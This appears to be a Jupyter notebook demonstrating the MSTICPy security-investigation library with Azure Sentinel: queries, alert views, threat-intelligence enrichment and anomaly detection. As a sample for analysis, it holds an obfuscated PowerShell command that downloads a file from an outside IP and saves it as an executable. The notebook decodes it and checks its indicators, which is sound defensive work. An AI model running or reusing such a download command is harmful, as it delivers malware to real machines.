# MSTICPy v1.0.0 Overview

This notebook demonstrates some of the functionality of MSTICPy.
New functionality is being added all the time (and old functionality improved,
or at least that is the plan), so be sure to check the latest documentation
on [MSTICPy Readthedocs](https://msticpy.readthedocs.io/en/latest/index.html).

## Pre-requisites

### Data
The first part of the notebook uses live data, so it must be run against a live
Azure Sentinel subscription. The latter half uses captured sample data, so it can be run
without Azure Sentinel.

### Threat Intelligence and Geo-location provider subscriptions
This notebook uses examples that assume that you have an account with one or
more of:
- VirusTotal
- AlienVault OTX
- IBM XForce
- Maxmind GeoLite

These providers all have free account tiers.

You can also use Azure Sentinel TI as a threat intelligence provider
but it is a good idea to have more than one provider available.

For more information on setting up accounts and configuring TI and GeoIP
providers see the following instructions:
- [MSTICPy configuration file](https://msticpy.readthedocs.io/en/latest/getting_started/msticpyconfig.html)
- [TI Provider configuration](https://msticpy.readthedocs.io/en/latest/data_acquisition/TIProviders.html#configuration-file)
- [GeoIP configuration](https://msticpy.readthedocs.io/en/latest/data_acquisition/GeoIPLookups.html#maxmind-geo-ip-lite-lookup-class)

You may also want to use the [MPConfigEdit](https://msticpy.readthedocs.io/en/latest/getting_started/SettingsEditor.html#msticpy-settings-editor)
tool to manage these settings.


# Load and initialize MSTICPy and the Notebook environment

Note that the first function called, `check_versions`, is only
available in Azure Machine Learning (AzML). It is copied to your AzML
workspace when you first launch a notebook from the Azure Sentinel UI.
Although some of its functions are only relevant to AzML, it has some
useful version checks. You can get a copy
[here](https://github.com/Azure/Azure-Sentinel-Notebooks/blob/master/utils/nb_check.py).
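If `nb_check.py` is not available, a basic Python version check is easy to approximate. The sketch below is not the `check_versions` implementation; `meets_minimum` is a hypothetical helper that compares version tuples rather than strings, so that "3.10" is correctly treated as newer than "3.6".

```python
import sys


def meets_minimum(required: str, actual) -> bool:
    """Return True if the `actual` version tuple is at least `required` (e.g. "3.6")."""
    required_parts = tuple(int(part) for part in required.split("."))
    # Compare only as many components as the requirement specifies
    return tuple(actual[: len(required_parts)]) >= required_parts


REQ_PYTHON_VER = "3.6"
python_ok = meets_minimum(REQ_PYTHON_VER, sys.version_info)
print("Python version OK" if python_ok else f"Python {REQ_PYTHON_VER} or later is required")
```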

In [1]:
from pathlib import Path
from IPython.display import display, HTML

REQ_PYTHON_VER = "3.6"
REQ_MSTICPY_VER = "1.0.0"

display(HTML("<h3>Starting Notebook setup...</h3>"))

# This is only available/relevant to use in Azure Sentinel/AzureML
if Path("../utils/nb_check.py").is_file():
    from utils.nb_check import check_versions
    check_versions(REQ_PYTHON_VER, REQ_MSTICPY_VER)


from msticpy.nbtools import nbinit
nbinit.init_notebook(
    namespace=globals(),
    # extra_imports=["my_module, class", "my_module.sub, func, alias"],
    # additional_packages=["pytest", "plotly"],
);


## Configuration
You may get warnings about missing configuration from `init_notebook`. MSTICPy uses
a lot of external services (in addition to Azure Sentinel) - e.g. threat intelligence
and IP geo-location providers. Each service typically needs an account (that you
need to create) and MSTICPy needs to be able to access that account information in
order to use the service. To do that we store this data in a central configuration
file - `msticpyconfig.yaml`. 

To learn more about setting this up see these two notebooks:

- [Getting Started with Azure Sentinel Notebooks](https://github.com/Azure/Azure-Sentinel-Notebooks/blob/master/A%20Getting%20Started%20Guide%20For%20Azure%20Sentinel%20ML%20Notebooks.ipynb)
- [Configuring the Notebook Environment](https://github.com/Azure/Azure-Sentinel-Notebooks/blob/master/ConfiguringNotebookEnvironment.ipynb)
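Before digging into configuration warnings, it can help to confirm that a configuration file is actually visible to the notebook. The sketch below assumes the two common locations: a path given in the `MSTICPYCONFIG` environment variable, and a `msticpyconfig.yaml` in the current directory. The `locate_config` helper and the lookup order are illustrative assumptions, not MSTICPy's own code.

```python
import os
from pathlib import Path
from typing import Optional


def locate_config(search_dir: str = ".") -> Optional[Path]:
    """Return the first msticpyconfig.yaml found, or None."""
    # 1. Explicit path from the environment variable
    env_value = os.environ.get("MSTICPYCONFIG")
    if env_value and Path(env_value).is_file():
        return Path(env_value)
    # 2. File in the given (by default, current) directory
    candidate = Path(search_dir) / "msticpyconfig.yaml"
    return candidate if candidate.is_file() else None


config_path = locate_config()
print(config_path or "No msticpyconfig.yaml found")
```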

### MSTICPy imports

The `init_notebook` function imports a number of MSTICPy components and some other common modules such as pandas and numpy.

The following cell lists the names that are now available in the notebook namespace.

In [5]:
print([obj for obj in dir() if not obj.startswith("_")])



# Data Queries

Data queries are the foundation of any analysis or investigation.
If you can't query data you have nothing to analyze.

First we need to load the data provider and authenticate to it. The example shown
is for Azure Sentinel but other data providers are supported, such as:
- Microsoft Defender
- Splunk
- Microsoft Graph

In [283]:
# See if we have an Azure Sentinel Workspace defined in our config file.
# If not, let the user specify Workspace and Tenant IDs

ws_config = WorkspaceConfig("CyberSecuritySoc")
if not ws_config.config_loaded:
    ws_config.prompt_for_ws()
    
print("Workspace Config:", ws_config)
qry_prov = QueryProvider(data_environment="AzureSentinel")
print("done")


Workspace Config: {'workspace_id': '8ecf8077-cf51-4820-aadd-14040956f35d', 'tenant_id': '72f988bf-86f1-41af-91ab-2d7cd011db47'}
done


In [284]:
qry_prov.connect(ws_config)


## What queries are available

You can choose from a set of predefined queries. [This list](https://msticpy.readthedocs.io/en/latest/data_acquisition/DataQueries.html) is
usually up to date, but the code itself is the real authority since we add
new queries frequently.

The easiest way to see the available queries is with the query browser.
This also lets you view usage/parameter information for each query.

In [275]:
qry_prov.browse_queries()


### Command-line alternative

Command-line enthusiasts can use:
```python
qry_prov.list_queries()
```
```
['Azure.get_vmcomputer_for_host',
 'Azure.get_vmcomputer_for_ip',
 'Azure.list_aad_signins_for_account',
 'Azure.list_aad_signins_for_ip',
 'Azure.list_all_signins_geo',
 'Azure.list_azure_activity_for_account',
 'Azure.list_azure_activity_for_ip',
 'Azure.list_azure_activity_for_resource',
 'Azure.list_storage_ops_for_hash',
 'Azure.list_storage_ops_for_ip',
 'AzureNetwork.az_net_analytics',
 ...
```

Alternatively, use Jupyter/IPython tab completion.
You can append a trailing "?" to see the syntax and required parameters of
the query:
```python
qry_prov.Azure.list_azure_activity_for_account?
```
```
Lists Azure Activity for Account

Parameters
----------
account_name: str
    The account name to find
add_query_items: str (optional)
    Additional query clauses
end: datetime (optional)
...
```



### Viewing help for a query function from the command line.

In [19]:
qry_prov.Azure.list_azure_activity_for_account?

Signature:       qry_prov.Azure.list_azure_activity_for_account(*args, **kwargs) -> Union[pandas.core.frame.DataFrame, Any]
Call signature:  qry_prov.Azure.list_azure_activity_for_account(*args, **kwargs)
Type:            partial
String form:     functools.partial(<bound method QueryProvider._execute_query of <msticpy.data.data_providers.Quer <...> object at 0x0000021CB07EA348>>, query_path='Azure', query_name='list_azure_activity_for_account')
File:            c:\users\ian\anaconda3\envs\condadev\lib\functools.py
Docstri

### Timespans

Nearly all queries need a time range parameter. You can specify this as a parameter
to the query function but you can also use the `QueryTime` widget to set your
desired time range and just pass it to the query.
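If you prefer to set the range in code rather than with the widget, you can build the boundaries yourself. This is a minimal sketch: `time_range` is a hypothetical helper, and it assumes the query accepts `start` and `end` datetime parameters (the query help lists `end` as an optional datetime parameter).

```python
from datetime import datetime, timedelta, timezone
from typing import Optional


def time_range(days: int, end: Optional[datetime] = None) -> dict:
    """Return start/end datetimes covering the `days` before `end` (default: now, UTC)."""
    end = end or datetime.now(timezone.utc)
    return {"start": end - timedelta(days=days), "end": end}


query_times = time_range(days=1)
print(query_times["start"].isoformat(), "->", query_times["end"].isoformat())

# Assumed usage, requires a connected query provider:
# qry_prov.WindowsSecurity.list_host_processes(host_name="VictimPC", **query_times)
```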

In [276]:
timespan = nbwidgets.QueryTime(units="day", auto_display=True)


In [65]:
result_df = qry_prov.WindowsSecurity.list_host_processes(timespan, host_name="VictimPC")
print("Result type:", type(result_df))
result_df.head(3)


Result type: <class 'pandas.core.frame.DataFrame'>


Unnamed: 0,TenantId,Account,EventID,TimeGenerated,Computer,SubjectUserSid,SubjectUserName,SubjectDomainName,SubjectLogonId,NewProcessId,NewProcessName,TokenElevationType,ProcessId,CommandLine,ParentProcessName,TargetLogonId,SourceComputerId,TimeCreatedUtc
0,8ecf8077-cf51-4820-aadd-14040956f35d,CONTOSO\VICTIMPC$,4688,2021-04-16 23:10:20.007000+00:00,VictimPc.Contoso.Azure,S-1-5-18,VICTIMPC$,CONTOSO,0x3e7,0x2924,C:\Windows\System32\cscript.exe,%%1936,0xb2c,"""C:\windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,f6638b82-98a5-4542-8bec-6bc0977f793f,2021-04-16 23:10:20.007000+00:00
1,8ecf8077-cf51-4820-aadd-14040956f35d,CONTOSO\VICTIMPC$,4688,2021-04-16 23:10:20.013000+00:00,VictimPc.Contoso.Azure,S-1-5-18,VICTIMPC$,CONTOSO,0x3e7,0x1cd0,C:\Windows\System32\conhost.exe,%%1936,0x2924,\??\C:\windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Windows\System32\cscript.exe,0x0,f6638b82-98a5-4542-8bec-6bc0977f793f,2021-04-16 23:10:20.013000+00:00
2,8ecf8077-cf51-4820-aadd-14040956f35d,CONTOSO\VICTIMPC$,4688,2021-04-16 23:10:31.817000+00:00,VictimPc.Contoso.Azure,S-1-5-18,VICTIMPC$,CONTOSO,0x3e7,0x1894,C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe,%%1936,0xcac,2796,C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe,0x0,f6638b82-98a5-4542-8bec-6bc0977f793f,2021-04-16 23:10:31.817000+00:00


### Extend an existing query

In [None]:
qry_prov.WindowsSecurity.list_host_processes(
    timespan,
    host_name="VictimPC",
    add_query_items="| summarize count() by NewProcessName | limit 10"
)

### Write your own query

In [67]:
qry_prov.exec_query("SecurityEvent | take 1000 | summarize count() by Computer, EventID | take 5")


Unnamed: 0,Computer,EventID,count_
0,AdminPc2.Contoso.Azure,8002,4
1,AdminPc2.Contoso.Azure,4688,4
2,AdminPc2.Contoso.Azure,5379,4
3,SHIR-Hive,4625,521
4,SHIR-Hive,5379,1


# Visualize the data in a timeline

Note: if you are running this notebook without an Azure Sentinel subscription
(or other log data source that you can load into a pandas DataFrame) you can
do the following to run the first two visualizations in this section:

- Run the cell "Retrieve sample data files" (towards the end of the notebook)
- Run the following Python code:
```python
result_df = qry_prov_loc.WindowsSecurity.list_host_processes()
```

## Event Timelines

In [69]:
result_df.mp_timeline.plot(source_columns=["Account", "NewProcessName", "CommandLine"], group_by="Account")

## Process Trees

In [281]:
(
    result_df
    # Raw string avoids Python's invalid-escape warning for "\V"
    .query(r"Account != 'CONTOSO\VICTIMPC$' ")
    .mp_process_tree
    .plot(legend_col="Account", show_table=True)
)


## Viewing Alerts

In [285]:
alert_list = qry_prov.SecurityAlert.list_alerts(timespan)

alert_list.mp_timeline.plot(source_columns=["AlertName","ExtendedProperties"], group_by="Severity", height=200)
alert_select = nbwidgets.SelectAlert(alerts=alert_list, action=nbdisplay.format_alert, auto_display=True)


Unnamed: 0,161
TenantId,8ecf8077-cf51-4820-aadd-14040956f35d
TimeGenerated,2021-04-20 23:45:30.306000+00:00
AlertDisplayName,Suspected credential theft activity
AlertName,Suspected credential theft activity
Severity,Medium
Description,This program exhibits suspect characteristics potentially associated with credential theft. Onc...
ProviderName,MDATP
VendorName,Microsoft
VendorOriginalId,da637532137136307388_199025118
SystemAlertId,9e51aab6-9d1d-23dd-36ee-f37e99e68ca4


In [90]:
nbdisplay.plot_entity_graph(
    security_alert_graph.create_alert_graph(SecurityAlert(alert_select.selected_alert))
)

# Enrichment with Threat Intelligence, WhoIs and GeoIP

We use Pivot functions here so that we can focus on IP-specific operations.

In [118]:
from msticpy.datamodel.pivot import Pivot
IpAddress = entities.IpAddress

pivot = Pivot(namespace=globals())

# Example of an IpAddress Pivot function
IpAddress.util.whois("23.102.129.200")

Using Open PageRank. See https://www.domcop.com/openpagerank/what-is-openpagerank


Unnamed: 0,asn,asn_cidr,asn_country_code,asn_date,asn_description,asn_registry,nets,nir,query,raw,raw_referral,referral
0,8075,23.102.0.0/16,US,2013-06-18,"MICROSOFT-CORP-MSN-AS-BLOCK, US",arin,"[{'cidr': '23.96.0.0/13', 'name': 'MSFT', 'handle': 'NET-23-96-0-0-1', 'range': '23.96.0.0 - 23....",,23.102.129.200,,,


## Side note - discovering pivot functions

If what you want to do is entity related, there is a good chance
that the MSTICPy function will appear as an entity *pivot function*.

### What is an Entity?
An entity is essentially a "noun" in the CyberSec world - e.g. IP Address, host, URL.
They are typically things that do things or have things done to them. Entities
will always have one or more properties that identify the entity or provide
additional context information. For example, an IpAddress entity has its primary
Address property and it might also have contextual properties like geo-location
or ASN data.

Pivot functions are verbs that perform investigative actions (like data queries)
on the entity and return a result. Host, for example, has data queries that
retrieve process or logon events logged for that host. IpAddress has functions
to look up its geolocation or query information about the address from
threat intelligence providers.
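The noun/verb relationship can be illustrated with a toy model. This is not how MSTICPy implements entities or pivots: `ToyIpAddress`, `PIVOT_FUNCS` and `pivot_func` are hypothetical names, and the only "verb" registered here uses the standard-library `ipaddress` module rather than a real lookup service.

```python
import ipaddress
from dataclasses import dataclass, field
from typing import Callable, Dict


@dataclass
class ToyIpAddress:
    """Toy entity: one identifying property plus optional context."""
    Address: str
    context: Dict[str, str] = field(default_factory=dict)


# Hypothetical registry mapping a verb name to a function that acts on the entity
PIVOT_FUNCS: Dict[str, Callable[[ToyIpAddress], dict]] = {}


def pivot_func(name: str):
    """Decorator that registers a function as a pivot on ToyIpAddress."""
    def register(func):
        PIVOT_FUNCS[name] = func
        return func
    return register


@pivot_func("ip_type")
def ip_type(ip: ToyIpAddress) -> dict:
    """Describe the address using only local information."""
    parsed = ipaddress.ip_address(ip.Address)
    return {"Address": ip.Address, "version": parsed.version, "private": parsed.is_private}


entity = ToyIpAddress("23.102.129.200")
for name, func in PIVOT_FUNCS.items():
    print(name, func(entity))
```

In MSTICPy the same idea is exposed as attributes on the entity class, as in `IpAddress.util.whois(...)` above.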

The easiest way to view the entities, their pivot functions and
help associated with each function is to use the Pivot browser.

In [286]:
pivot.browse()


## Build a pipeline to do everything at once

Note: we join the results of each step to the previous one.
We also add a call to `mp_pivot.display()` to show intermediate results.
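The `join` argument decides what happens to input rows that get no enrichment result. The sketch below mimics the idea with plain dictionaries and is only an illustration: `join_rows` is a hypothetical helper, the `10.0.0.4` row is made up, and a pandas join would fill unmatched columns with `NaN` rather than omit them.

```python
def join_rows(rows, lookup, key, how="left"):
    """Join enrichment results (a dict keyed by the `key` value) onto a list of row dicts."""
    joined = []
    for row in rows:
        extra = lookup.get(row[key])
        if extra is None and how == "inner":
            continue  # inner join drops rows that have no match
        joined.append({**row, **(extra or {})})
    return joined


# One address from the alert output and one made-up address with no results
alert_ips = [{"Address": "23.102.129.200"}, {"Address": "10.0.0.4"}]
whois = {"23.102.129.200": {"asn_description": "MICROSOFT-CORP-MSN-AS-BLOCK, US"}}
geo = {"23.102.129.200": {"CountryCode": "US"}}

# Same shape as the pipeline: inner join first, then left join
enriched = join_rows(
    join_rows(alert_ips, whois, "Address", how="inner"), geo, "Address", how="left"
)
print(enriched)
```

Using an inner join for the first step keeps only the addresses that returned a result; the later left joins then never reduce the row count.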

In [116]:
IpAddress = entities.IpAddress

enriched_ip_df = (
    pd.DataFrame(alert_select.selected_alert.Entities)
    .mp_pivot.run(IpAddress.util.whois, column="Address", join="inner")
    .dropna(axis=1)
    .mp_pivot.run(IpAddress.util.geoloc, column="Address", join="left")
    .mp_pivot.display(title="GeoIP and Whois", cols=["Address", "asn_description", "City", "State", "CountryCode"])
    .mp_pivot.run(IpAddress.ti.lookup_ip, column="Address", join="left")
)

Unnamed: 0,Address,asn_description,City,State,CountryCode
0,23.102.129.200,"MICROSOFT-CORP-MSN-AS-BLOCK, US",San Antonio,Texas,US
1,52.156.139.47,"MICROSOFT-CORP-MSN-AS-BLOCK, US",,Washington,US
2,20.84.50.45,"MICROSOFT-CORP-MSN-AS-BLOCK, US",Washington,Virginia,US
3,52.247.224.91,"MICROSOFT-CORP-MSN-AS-BLOCK, US",,Washington,US


## Display the TI Results in a browsable format

In [287]:
TILookup.browse_results(enriched_ip_df)


0,1
XForce,
score,1
cats,
categoryDescriptions,
reason,Regional Internet Registry
reasonDescription,One of the five RIRs announced a (new) location mapping of the IP.
tags,[]


# Investigating Obfuscated commands

```bash
powershell.exe  -nop -w hidden -encodedcommand SW52b2tlLVdlYlJlcXVlc3QgLVVyaSAiaHR0cDovLzM4Ljc1LjEzNy45OjkwODgvc3RhdGljL2VuY3J5cHQubWluLmpzIiAtT3V0RmlsZSAiYzpccHduZXIuZXhlIg==
```
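To see what the MSTICPy helpers in the next cell automate, here is a standard-library sketch of the same two steps: decode the Base64 argument, then pull out anything that looks like an IPv4 address. The regular expressions are simplified assumptions, not the patterns MSTICPy uses. Note that this sample payload decodes as UTF-8; genuine PowerShell `-EncodedCommand` values are Base64 of UTF-16LE text, so real-world samples usually need `decode("utf-16-le")` instead.

```python
import base64
import re

command_line = (
    "powershell.exe  -nop -w hidden -encodedcommand "
    "SW52b2tlLVdlYlJlcXVlc3QgLVVyaSAiaHR0cDovLzM4Ljc1LjEzNy45OjkwODgvc3RhdGljL2VuY3J5cHQubWluLmpzIiAtT3V0RmlsZSAiYzpccHduZXIuZXhlIg=="
)

# Grab the Base64 blob that follows the -encodedcommand switch
match = re.search(r"-encodedcommand\s+([A-Za-z0-9+/=]+)", command_line, re.IGNORECASE)
decoded = base64.b64decode(match.group(1)).decode("utf-8")
print("Decoded:", decoded)

# Simplified IPv4 pattern (does not validate octet ranges)
ips = re.findall(r"\b(?:\d{1,3}\.){3}\d{1,3}\b", decoded)
print("IPv4 candidates:", ips)
```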

In [288]:
encoded_cmd = '''
powershell.exe  -nop -w hidden -encodedcommand SW52b2tlLVdlYlJlc
XVlc3QgLVVyaSAiaHR0cDovLzM4Ljc1LjEzNy45OjkwODgvc3RhdGljL2VuY3J5cHQubWluLmpzIiAtT3V0RmlsZSAiYzpccHduZXIuZXhlIg==
'''

print(f"Encoded string: {encoded_cmd}")
dec_string, dec_df = base64unpack.unpack_items(input_string=encoded_cmd)
print("Decoded string:", dec_string)

# Extract any IoCs that we can check in TI providers
iocs = IoCExtract().extract_df(data=dec_df, columns="decoded_string")
md("IoCs Found", "bold, large")
display(iocs)

# Lookup and display TI results
ti_results = ti_lookup.lookup_iocs(data=iocs, obs_col="Observable")
ti_lookup.browse_results(ti_results)

Encoded string: 
powershell.exe  -nop -w hidden -encodedcommand SW52b2tlLVdlYlJlc
XVlc3QgLVVyaSAiaHR0cDovLzM4Ljc1LjEzNy45OjkwODgvc3RhdGljL2VuY3J5cHQubWluLmpzIiAtT3V0RmlsZSAiYzpccHduZXIuZXhlIg==

Decoded string: 
powershell.exe  -nop -w hidden -encodedcommand <decoded type='string' name='[None]' index='1' depth='1'>Invoke-WebRequest -Uri "http://38.75.137.9:9088/static/encrypt.min.js" -OutFile "c:\pwner.exe"</decoded>
AA


Unnamed: 0,IoCType,Observable,SourceIndex,Input
0,ipv4,38.75.137.9,0,"Invoke-WebRequest -Uri ""http://38.75.137.9:9088/static/encrypt.min.js"" -OutFile ""c:\pwner.exe"""
1,url,http://38.75.137.9:9088/static/encrypt.min.js,0,"Invoke-WebRequest -Uri ""http://38.75.137.9:9088/static/encrypt.min.js"" -OutFile ""c:\pwner.exe"""



0,1
OTX,
pulse_count,4
names,"['Underminer.EK - Exploit Kit IOC Feed', '', 'Underminer.EK - Exploit Kit IOC Feed', 'Underminer EK']"
tags,"[['Underminer.EK'], ['Underminer.EK'], ['Underminer.EK'], []]"
references,"[[], [], [], ['https://blog.malwarebytes.com/threat-analysis/2019/07/exploit-kits-summer-2019-review/']]"


## Plot GeoLocation of our bad IP address(es)

In [198]:
geo_locations = (
    # Use pivot function to lookup location
    IpAddress.util.geoloc(iocs.query("IoCType == 'ipv4'").drop_duplicates(),
                          column="Observable")
    # Convert the location data to GeoLocation entities
    .apply(entities.GeoLocation, axis=1)
)

# Create a map
geo_map = FoliumMap(zoom_start=10, height="75%", width="75%")
geo_map.add_geoloc_cluster(geo_locations, color='red')
geo_map.center_map()

# Display the map
utils.md("Geolocations for IP addresses", "large, bold")
utils.md("Click on a marker for more information")
display(geo_map.folium_map)

# Using advanced analysis (AKA simple machine learning)

## Retrieve sample data files

In [292]:
from urllib.request import urlretrieve
from pathlib import Path
from tqdm.auto import tqdm

github_uri = "https://raw.githubusercontent.com/Azure/Azure-Sentinel-Notebooks/master/{file_name}"
github_files = {
    "exchange_admin.pkl": "data",
    "processes_on_host.pkl": "data",
    "timeseries.pkl": "data",
    "data_queries.yaml": "data",
}

Path("data").mkdir(exist_ok=True)
for file, path in tqdm(github_files.items(), desc="File download"):
    file_path = Path(path).joinpath(file)
    print(file_path, end=", ")
    url_path = f"{path}/{file}" if path else file
    urlretrieve(
        github_uri.format(file_name=url_path),
        file_path
    )
    assert Path(file_path).is_file()
    
qry_prov_loc = QueryProvider("LocalData", data_paths=["./data"], query_paths=["./data"])
qry_prov_loc.connect()


data\exchange_admin.pkl, data\processes_on_host.pkl, data\timeseries.pkl, data\data_queries.yaml, Connected.


## Time Series Decomposition - Anomaly detection

In [293]:
ob_bytes_per_hour = qry_prov_loc.Network.get_network_summary(timespan)
md("Sample data:", "large")
ob_bytes_per_hour.head(3)

TimeGenerated,TotalBytesSent
2020-07-06 00:00:00+00:00,10823
2020-07-06 01:00:00+00:00,14821
2020-07-06 02:00:00+00:00,13532


In [209]:
from msticpy.nbtools.timeseries import display_timeseries_anomolies
from msticpy.analysis.timeseries import timeseries_anomalies_stl

# Conduct our timeseries analysis
ts_analysis = timeseries_anomalies_stl(ob_bytes_per_hour)
# Visualize the timeseries and any anomalies
display_timeseries_anomolies(data=ts_analysis, y="TotalBytesSent");

md("We can see two clearly anomalous data points representing unusual outbound traffic.<hr>", "bold")

<hr>

## Detecting anomalous sequences using Markov Chain

The **anomalous_sequence** MSTICPy package uses Markov Chain analysis to predict the probability<br>
that a particular sequence of events will occur given what has happened in the past.

Here we're applying it to Office activity. 


## Query the data

In [212]:
query = """
| where TimeGenerated >= ago(60d)
| where RecordType_s == 'ExchangeAdmin'
| where UserId_s !startswith "NT AUTHORITY"
| where UserId_s !contains "prod.outlook.com"  
| extend params = todynamic(strcat('{"', Operation_s, '" : ', tostring(Parameters_s), '}')) 
| extend UserId = UserId_s, ClientIP = ClientIP_s, Operation = Operation_s
| project TimeGenerated= Start_Time_t, UserId, ClientIP, Operation, params
| sort by UserId asc, ClientIP asc, TimeGenerated asc
| extend begin = row_window_session(TimeGenerated, 20m, 2m, UserId != prev(UserId) or ClientIP != prev(ClientIP))
| summarize cmds=makelist(Operation), end=max(TimeGenerated), nCmds=count(), nDistinctCmds=dcount(Operation),
params=makelist(params) by UserId, ClientIP, begin
| project UserId, ClientIP, nCmds, nDistinctCmds, begin, end, duration=end-begin, cmds, params
"""
exchange_df = qry_prov_loc.Azure.OfficeActivity(add_query_items=query)
print(f"Number of events {len(exchange_df)}")
exchange_df.drop(columns="params").head()

Number of events 146


Unnamed: 0,UserId,ClientIP,nCmds,nDistinctCmds,begin,end,duration,cmds
0,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,28,1,2020-06-21 02:36:46+00:00,2020-06-21 02:36:46+00:00,0 days,"[Set-ConditionalAccessPolicy, Set-ConditionalAccessPolicy, Set-ConditionalAccessPolicy, Set-Cond..."
1,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,28,1,2020-06-21 05:31:34+00:00,2020-06-21 05:31:34+00:00,0 days,"[Set-ConditionalAccessPolicy, Set-ConditionalAccessPolicy, Set-ConditionalAccessPolicy, Set-Cond..."
2,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,2,1,2020-06-22 02:27:06+00:00,2020-06-22 02:27:06+00:00,0 days,"[Set-ConditionalAccessPolicy, Set-ConditionalAccessPolicy]"
3,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,26,1,2020-06-22 02:30:52+00:00,2020-06-22 02:30:52+00:00,0 days,"[Set-ConditionalAccessPolicy, Set-ConditionalAccessPolicy, Set-ConditionalAccessPolicy, Set-Cond..."
4,NAMPRD06\Administrator (Microsoft.Office.Datacenter.Torus.PowerShellWorker),,28,1,2020-06-22 04:55:59+00:00,2020-06-22 04:55:59+00:00,0 days,"[Set-ConditionalAccessPolicy, Set-ConditionalAccessPolicy, Set-ConditionalAccessPolicy, Set-Cond..."


## Perform Anomalous Sequence analysis on the data

The analysis groups events into sessions (time-bounded and linked by a common account). It then<br>
builds a probability model for the types of *command* (e.g. "SetMailboxProperty")<br>
and the parameters and parameter values used for that command.

In other words: how likely is it that a given user would run this sequence of commands in a logon session?

Using this probability model, we can highlight sequences that have an extremely low probability, based<br>
on prior behavior.
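The core idea can be sketched in a few lines of plain Python. This is a deliberately simplified first-order Markov model over command names only; it is not the MSTICPy implementation, which also models parameters and their values. The training sessions are made up for illustration, and `floor` is an assumed stand-in probability for transitions never seen in training.

```python
from collections import Counter, defaultdict
from math import log


def fit_transitions(sessions):
    """Estimate P(next command | current command) from observed sessions."""
    counts = defaultdict(Counter)
    for session in sessions:
        for current, nxt in zip(session, session[1:]):
            counts[current][nxt] += 1
    return {
        current: {nxt: n / sum(followers.values()) for nxt, n in followers.items()}
        for current, followers in counts.items()
    }


def rarest_window(session, transitions, window_length=3, floor=1e-6):
    """Return (likelihood, window) for the least likely window in the session."""
    rarest = None
    for start in range(max(1, len(session) - window_length + 1)):
        window = session[start:start + window_length]
        likelihood = 1.0
        for current, nxt in zip(window, window[1:]):
            likelihood *= transitions.get(current, {}).get(nxt, floor)
        if rarest is None or likelihood < rarest[0]:
            rarest = (likelihood, window)
    return rarest


# Made-up history of "normal" sessions
history = [
    ["Set-Mailbox", "Set-Mailbox", "Set-ConditionalAccessPolicy"],
    ["Set-Mailbox", "Set-ConditionalAccessPolicy", "Set-ConditionalAccessPolicy"],
    ["Set-Mailbox", "Set-Mailbox", "Set-Mailbox"],
]
model = fit_transitions(history)

common_likelihood, _ = rarest_window(history[0], model)
unusual_likelihood, _ = rarest_window(
    ["Set-Mailbox", "Update-RoleGroupMember", "Set-Mailbox"], model
)

# Same transformation as the notebook: invert the likelihood and take the log
common_rarity = log(1 / common_likelihood)
unusual_rarity = log(1 / unusual_likelihood)
print(f"common: {common_rarity:.2f}, unusual: {unusual_rarity:.2f}")
```

A session containing a transition that never appeared in the history gets a very small likelihood and therefore a high rarity score, which is what the plot in the next cell highlights.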


In [271]:
from msticpy.analysis.anomalous_sequence.utils.data_structures import Cmd
from msticpy.analysis.anomalous_sequence import anomalous

# Support function to extract parameter values to a list of Cmd objects
def process_exchange_session(session_with_params):
    new_ses = []
    for cmd in session_with_params:
        cmd_name, params = next(iter(cmd.items()))
        new_ses.append(Cmd(name=cmd_name, params={param["Name"]: param["Value"] for param in params}))
    return new_ses

# apply this function to create the param_value_session column
exchange_df['param_value_session'] = exchange_df.apply(
    lambda x: process_exchange_session(session_with_params=x.params),
    axis=1
)

# create the anomaly model
modelled_df = anomalous.score_sessions(
    data=exchange_df,
    session_column='param_value_session',
    window_length=3
)

# Invert the likelihood to create rarity score and take the log to normalize the plot
modelled_df["rarity"] = np.log(1 / modelled_df.rarest_window3_likelihood)

md("Session rarity - higher score is more unusual", "large, bold")
anomalous.visualise_scored_sessions(
    data_with_scores=modelled_df,
    time_column='begin',  # this will appear on the x-axis
    score_column='rarity',  # this will appear on the y axis
    window_column='rarest_window3',  # this will represent the session in the tool-tips
    source_columns=['UserId', 'ClientIP'],  # specify any additional columns to appear in the tool-tips

)

In [289]:
import pprint

rarity_max=modelled_df["rarity"].max()
rarity_min=modelled_df["rarity"].min()
slider_step = rarity_max / 20
start_val = rarity_max - slider_step
threshold = widgets.FloatSlider(
    description="Select rarity threshold",
    max=rarity_max + slider_step,
    min=0,
    value=start_val,
    step=slider_step,
    layout=widgets.Layout(width="60%"),
    style={"description_width": "200px"},
#     readout_format=".7f"
)


disp_cols = [
    "UserId", "ClientIP", "begin", "end", "param_value_session", "rarity"
]


def show_details(disp_df):
    html = []
    for idx, (_, rarest_event) in enumerate(disp_df.iterrows(), 1):
        html.append(f"<h3>Event {idx} - Rarity: {rarest_event.rarity:.3f}</h3>")
        html.append("<hr>")
        html.append("Param session details:<br>")
        for cmd in rarest_event.param_value_session:
            html.append(f"Command: {cmd.name}<br>")
            html.append(pprint.pformat(cmd.params))
            html.append("<br>")
        html.append("<hr><br>")
    output = "".join(html) if html else "No items selected"
    return HTML(output)


def show_rows(change):
    thresh = change["new"]
    disp_df = modelled_df[modelled_df["rarity"] > thresh][disp_cols].sort_values("rarity", ascending=False)
    pd_disp.update(disp_df)
    det_disp.update(show_details(disp_df))

threshold.observe(show_rows, names="value")
md("Move the slider to see event sessions above the selected <i>rarity</i> threshold", "bold")
display(HTML("<hr>"))
display(threshold)
display(HTML("<hr>"))
md(f"Range is {rarity_min:.3f} (min rarity) to {rarity_max:.3f} (max rarity)<br><br><hr>")
disp_df = modelled_df[modelled_df["rarity"] > start_val][disp_cols].sort_values("rarity", ascending=False)
pd_disp = display(disp_df, display_id=True)
det_disp = display(show_details(disp_df), display_id=True)


Unnamed: 0,UserId,ClientIP,begin,end,param_value_session,rarity
145,timvic@contoso.onmicrosoft.com,20.185.182.48:37965,2020-07-29 20:11:27+00:00,2020-07-29 20:11:27+00:00,"[Cmd(name='Update-RoleGroupMember', params={'Members': 'CBoehmSA;pcadmin;SecurityAdmins_20075581...",12.882805


In [None]:
rarest_events = (
